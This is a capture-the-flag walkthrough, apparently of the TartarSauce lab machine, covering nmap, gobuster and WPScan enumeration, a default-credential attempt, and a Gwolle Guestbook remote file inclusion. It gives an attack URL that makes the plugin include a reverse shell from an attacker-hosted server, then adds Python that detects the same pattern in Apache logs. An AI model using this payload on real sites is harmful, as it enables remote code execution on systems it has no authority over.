TartarSauce: Scanning and Enumeration

Scanning

kali@kali:~$ nmap -p 80 -sC -sV 10.10.10.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 09:25 EDT
Nmap scan report for 10.10.10.88
Host is up (0.083s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds

Enumeration

Attempted password

Tried the credentials admin/admin.

Found wp directory

kali@kali:~$ gobuster dir --url http://10.10.10.88/webservices --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.88/webservices
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/29 10:16:55 Starting gobuster
===============================================================
/wp (Status: 301)

WPScan

wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive --api-token [api_token]

The scan found the gwolle-gb plugin installed.

Running searchsploit against it turns up a Remote File Inclusion vulnerability.

kali@kali:~$ searchsploit gwolle
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion                 | php/webapps/38861.txt
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Further analysis of the exploit text shows that we need to host a reverse shell named wp-load.php on our own machine, then request the following link so the plugin includes it:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

Doing so should allow us to obtain a reverse shell.
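As an added defender-side example (not part of the original writeup), the following Python scans Apache access-log lines for requests to the gwolle-gb ajaxresponse.php endpoint whose abspath parameter points at a remote host, which is exactly the RFI pattern described above. The log lines and IP addresses are constructed samples, and the log regex is a simplified combined-format parser.

```python
import re
from urllib.parse import urlparse, parse_qs

# Simplified Apache combined-log parser (assumption: one request per line, no spaces in the target).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# The vulnerable plugin endpoint named in the searchsploit entry above.
VULN_PATH = "/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php"


def is_remote_include(value: str) -> bool:
    """True when an include path points off-host: http(s)://, ftp://, or protocol-relative //host."""
    v = value.strip().lower()
    return v.startswith(("http://", "https://", "ftp://", "//"))


def check_request(target: str):
    """Return the offending abspath value for one request target (path + query), or None."""
    parsed = urlparse(target)
    if not parsed.path.endswith(VULN_PATH):
        return None
    # parse_qs percent-decodes, so an encoded local path like %2Fvar%2Fwww is not mistaken for a URL.
    for val in parse_qs(parsed.query).get("abspath", []):
        if is_remote_include(val):
            return val
    return None


def scan_log(lines):
    """Return (client_ip, timestamp, abspath) for every remote-include attempt found in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        val = check_request(m.group("target"))
        if val is not None:
            hits.append((m.group("ip"), m.group("ts"), val))
    return hits


# Constructed sample log lines (not from the original page): one RFI attempt, one local abspath, one benign hit.
SAMPLE_LOG = """\
10.10.14.5 - - [29/Oct/2020:10:30:01 -0400] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/ HTTP/1.1" 200 12 "-" "curl/7.72.0"
10.10.14.5 - - [29/Oct/2020:10:30:05 -0400] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=%2Fvar%2Fwww%2Fhtml%2F HTTP/1.1" 200 12 "-" "curl/7.72.0"
10.10.14.9 - - [29/Oct/2020:10:31:00 -0400] "GET /webservices/wp/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, ts, path in scan_log(SAMPLE_LOG):
        print(f"RFI attempt from {ip} at {ts}: abspath={path}")
```

Feeding the real access log through scan_log gives the source IP and the attacker-controlled host to block, and the same abspath check can be wired into a WAF rule on that endpoint.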
